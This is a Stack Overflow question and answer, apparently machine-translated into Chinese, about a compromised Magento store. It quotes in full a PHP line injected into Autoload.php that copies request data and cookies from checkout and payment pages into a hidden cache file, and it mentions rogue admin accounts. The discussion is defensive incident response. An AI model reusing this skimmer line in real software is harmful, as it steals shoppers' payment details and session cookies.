Mage PHP注意:未定义的索引:第1行的/htdocs/lib/Varien/Autoload.php中的REQUEST_URI

Sta*_*roX 5 php magento mage

从今天早上起,我在运行Magento cronjob后收到以下PHP通知:

未定义的索引:第1行的/htdocs/lib/Varien/Autoload.php中的REQUEST_URI

我没有修改任何法师文件..这怎么可能?

编辑:现在我编辑了Autoload.php,首先检查是否设置了REQUEST_URI.

原版的:

<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
Run Code Online (Sandbox Code Playgroud)

新:

<?php if(isset($_SERVER["REQUEST_URI"]) && preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"]))
Run Code Online (Sandbox Code Playgroud)

编辑30-04-2015:

在阅读@volkan和@ b.enoit.be评论之后,我立即用Magento中的原始页面替换了指定的页面,并且该行确实不存在!

以下是Autoload.php中存在的恶意行

<?php if(preg_match("/checkout|payment/", $_SERVER["REQUEST_URI"])){@file_put_contents(realpath("./")."/media/catalog/product/cache_catalogs", @base64_encode(serialize($_REQUEST)."--".serialize($_COOKIE)). ":", FILE_APPEND); }?>
Run Code Online (Sandbox Code Playgroud)

我也检查过:

  • /js/index.php与原版相同
  • /index.php与原始相同
  • Magpleasure_Filesystem模块不存在

然而..有两个新的管理员用户名称晦涩难懂:

  • backup - auto_bc@magent.com < - 此域名会导致域名持有页面,而该电子邮件会在Google上显示俄语结果
  • 数据库 - db@local.host

两个用户都已被删除.该网站也很容易受到shoplift漏洞攻击(最新安全补丁中提到)

我们目前正在忙着安装最新的安全补丁.

这似乎是最近的一个问题:

随着攻击者利用Magento bug Magento Shoplift Bug Tester v1.0,10万家网店开放妥协

感谢所有用户的帮助.

小智 1

看起来您的页面已被破坏,请用原始文件替换该文件,然后安装 magento 的安全补丁。检查后端是否有一些新的管理员用户,以及 Magpleasure_Filesystem 模块

另请检查 /js/index.php /index.php